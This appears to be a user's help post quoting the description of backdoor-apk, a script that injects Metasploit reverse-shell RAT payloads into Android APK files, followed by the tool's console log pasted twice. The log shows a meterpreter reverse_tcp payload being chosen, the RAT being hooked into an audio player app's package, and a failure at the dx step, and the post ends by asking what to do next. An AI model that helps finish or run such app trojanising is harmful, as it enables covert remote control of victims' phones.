backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
[] Running backdoor-apk.sh v0.2.4a on Sat Oct 19 09:51:01 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 127.0.0.1
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Decompiling original APK file...done.
[] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/maxmpz/audioplayer
[+] Smali file to hook RAT payload: cc/binmt/signature/PmsHookApplication.smali
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[+] Keeping permissions of original project
[] Injecting helpful Java classes in RAT APK file...done.
[!] Failed to run dx on Java class files
[] Running backdoor-apk.sh v0.2.4a on Sat Oct 19 09:51:01 EDT 2018 [+] Android payload options: 1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: 127.0.0.1 [?] Please enter an LPORT value: 4444 [+] Android manifest permission options: 1) Keep original 2) Merge with payload and shuffle [?] Please select an Android manifest permission option: 1 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [] Decompiling original APK file...done. [] Locating smali file to hook in original project...done. [+] Package where RAT smali files will be injected: com/maxmpz/audioplayer [+] Smali file to hook RAT payload: cc/binmt/signature/PmsHookApplication.smali [] Generating RAT APK file...done. [] Decompiling RAT APK file...done. [+] Keeping permissions of original project [] Injecting helpful Java classes in RAT APK file...done. [!] Failed to run dx on Java class files
So what now??